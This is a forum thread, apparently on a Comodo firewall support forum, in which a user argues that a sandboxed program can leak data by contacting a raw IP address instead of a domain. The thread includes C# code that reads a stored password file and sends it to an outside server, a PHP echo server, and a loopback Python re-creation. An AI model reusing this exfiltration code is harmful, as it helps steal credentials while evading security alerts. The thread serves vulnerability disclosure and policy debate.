Did you read what I said? I just have to use an IP and not a domain, and I won't get any alert from D+ because it won't use DNS, and Defense+ won't react to this.
But I don't own a server with my own IP. Or must I create a special network at home to show you?
So I changed the application a little, and I set up a server with WAMP on another computer connected to a separate network to be sure it's not on my local network.
My network is 192.168.0.0/255.255.255.0 and the server is on 220.127.116.11/255.255.255.0.
I try to steal a password from an application that stores it in a file named mypreciousdata.dat in c:\program files\Myapps.
Here is the code of the application in C#:
```csharp
using System;
using System.IO;
using System.Net;
using System.Windows.Forms;

static class Program
{
    /// Main entry point of the application.
    [STAThread]
    static void Main()
    {
        // Read the first line of the "precious" file.
        StreamReader monStreamReader = new StreamReader("c:/Program Files/Myapps/mypreciousdata.dat");
        string data = monStreamReader.ReadLine();
        string result = "";
        MessageBox.Show("your precious data is : " + data);
        // Send it to the test server by raw IP, so no DNS lookup is involved.
        WebClient client = new WebClient();
        result = client.DownloadString("http://18.104.22.168/echo.php?data=" + data);
        MessageBox.Show("Answer from website : " + result);
    }
}
```
Code of the PHP server:
```php
My steal data : <?php echo $_GET['data'] // reflect the query parameter back unchanged ?>
```
Here we go: I execute my application, CIS sandboxes it (see test1.jpg).
And then the data is sent ... the PHP server answered me ... (see test2.jpg).
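The exchange above, reproduced as an added Python example that is not part of the original post and not the poster's code: both sides run on loopback (the server is a stand-in for echo.php, the client does the same GET the C# program does), the "secret" is a constructed sample value, and a small check classifies the destination host so you can see why a raw-IP URL never triggers a DNS query while a hostname would. The port is chosen by the OS at start; nothing leaves the machine.

```python
import ipaddress
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlsplit, parse_qs, urlencode
from urllib.request import build_opener, ProxyHandler


def needs_dns(url):
    """True if reaching this URL needs a DNS lookup (host is a name, not an IP literal)."""
    host = urlsplit(url).hostname
    try:
        ipaddress.ip_address(host)
        return False   # numeric address: the resolver is never asked anything
    except ValueError:
        return True    # a name: a DNS query goes out before the connection


class EchoHandler(BaseHTTPRequestHandler):
    """Stand-in for echo.php: reflects the 'data' query parameter back."""

    def do_GET(self):
        params = parse_qs(urlsplit(self.path).query)
        data = params.get("data", [""])[0]
        body = ("My steal data : " + data).encode()
        self.send_response(200)
        self.send_header("Content-Type", "text/plain; charset=utf-8")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):   # keep the demo quiet
        pass


def start_echo_server():
    """Bind the fake server to loopback on an OS-chosen port; returns (server, port)."""
    server = HTTPServer(("127.0.0.1", 0), EchoHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, server.server_address[1]


def exfiltrate(base_url, data):
    """Client side: GET base_url?data=... and return the reply body (like WebClient.DownloadString)."""
    url = base_url + "?" + urlencode({"data": data})
    opener = build_opener(ProxyHandler({}))   # ignore any proxy env vars for this local test
    with opener.open(url, timeout=5) as resp:
        return resp.read().decode()


def run_demo():
    """Run the whole exchange; returns (dns_needed, server_reply)."""
    server, port = start_echo_server()
    try:
        base = "http://127.0.0.1:%d/echo.php" % port   # raw IP destination, as in the post
        reply = exfiltrate(base, "hunter2")            # constructed sample secret
        return needs_dns(base), reply
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    dns, reply = run_demo()
    print("DNS lookup needed:", dns)
    print("Server reply:", reply)
```

The only thing that distinguishes the two cases at the network layer is the resolver step: with an IP literal there is no DNS packet for a DNS-based alert to key on, so a control that wants to catch this has to look at the outbound connection itself (destination, process, or content), not at name resolution.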
Let me ask you politely: are you okay? 88) I mean, what kind of logic is this, huh? You talk and talk and talk about prevention, but now when we ask for PREVENTION for possible exploit(s) you give these lame excuses?
Why did you add the Sandbox then? FOR PREVENTION! You have said many times that D+ is almost bulletproof and no malware in the wild can bypass it, but you still added the Sandbox for PREVENTION!
What I am saying is: there is a risk vs. reward ratio. There is no 100% security, and no security vendor tries to close every theoretical hole. Which means the focus has to be on what really matters, which is real malware out there. No point in disturbing the user for a theoretical protection.
So why use this kind of rule? It's the only error here, because the application won't do anything to the system; that's why D+ doesn't see anything. It's just about taking information, and that's all.
You made the rule because you think it will be better for novice users, but what do novice users use? All the applications that lots of people use, and so without any alert, because they are already in your safe list.
So really, why put this rule in when it can be a security hole in certain conditions?
I think a way around this rule would be to use the whitelist for the firewall also: if the application is signed and part of the whitelist it gets access; if not, you get asked. I don't think it would be too hard to implement, and that way you would have security and ease of use.
You're talking about the firewall's Safe Mode, which has been present in CIS since its beginning.
I personally have a problem with the way the new firewall policy is implemented, rather than with the fact that there exists such a thing as an allow-all-outgoing-connections mode in CIS. By adding this weird policy to Application Rules in Network Security Policy, Comodo has practically rendered the Firewall Security Level setting completely useless. IMHO, here is how it should be done...
These possibilities exist IF you can infect the PC in the first place.
So what is being talked about here is NOT even how to infect the PC...
It is: IF they managed to infect the PC, this is how they can extract information.